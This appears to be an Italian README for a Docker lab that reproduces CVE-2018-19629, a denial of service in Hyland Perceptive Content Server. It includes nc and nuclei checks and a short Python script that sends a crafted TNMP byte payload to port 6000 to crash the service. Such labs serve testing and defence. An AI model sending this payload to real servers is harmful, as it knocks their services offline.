
Hyland Perceptive Content Server - Negazione del Servizio
Ambiente di test Docker per CVE-2018-19629 - Hyland Perceptive Content Server Denial of Service.
| Campo | Valore |
|---|---|
| ID CVE | CVE-2018-19629 |
| Gravità | Alta (DoS) |
| Versioni affette | Hyland Perceptive Content Server < 7.1.5 |
| Versione corretta | 7.1.5 |
Hyland Perceptive Content Server prima della versione 7.1.5 contiene una vulnerabilità di denial of service causata dal crash del servizio ImageNow Server tramite una connessione TCP. Gli aggressori possono interrompere il servizio inviando pacchetti TCP appositamente predisposti contenenti la sequenza di intestazione TNMP.
# Start the vulnerable environment
docker-compose up -d
# Verify it's listening
# (You might need netcat or similar)
nc -zv localhost 6000
# Test with nuclei template
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000
Puoi attivare manualmente il crash usando Python:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# The crafted packet
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()
Controlla i log per vedere il crash:
docker logs -f imagenow-vuln
Dovresti vedere: [!] CRITICAL: Recevied malicious 'TNMP' packet... seguito dal riavvio del container.
docker-compose down